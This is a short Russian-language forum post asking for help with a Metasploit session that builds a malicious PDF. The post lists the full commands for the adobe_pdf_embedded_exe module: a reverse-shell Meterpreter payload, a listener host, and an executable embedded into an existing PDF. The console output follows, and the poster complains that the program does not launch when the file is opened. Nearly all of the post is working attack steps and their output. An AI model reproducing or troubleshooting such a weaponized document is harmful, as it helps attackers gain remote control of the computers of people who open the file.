
08.05.2010, 00:49
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
С нами:
8988613
Репутация:
33
|
|
Pdf сплойт, работа с Metasploit Console
Прописываю следующее
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /home/1/1.pdf
INFILENAME => /home/1/1.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /home/1/1.exe
EXENAME => /home/1/1.exe
msf exploit(adobe_pdf_embedded_exe) > set FILENAME 1_new.pdf
FILENAME => 1_new.pdf
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /home/1
OUTPUTPATH => /home/1
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started reverse handler on port 4444[*] Reading in '/home/1/1.pdf'...[*] Parsing '/home/1/1.pdf'...[*] Parsing Successful.[*] Using '/home/1/1.exe' as payload...[*] Creating '1_new.pdf' file...[*] Generated output file /home/1/1_new.pdf[*] Exploit completed, but no session was created.
Новый pdf файл создает успешно. При запуске выдает предупреждение. нажимаю Open file, но программу не запускает (попросту не видит). Я склоняюсь к тому что уязвимость не пашет под моей версией Adobe Reader'a.
|
|
|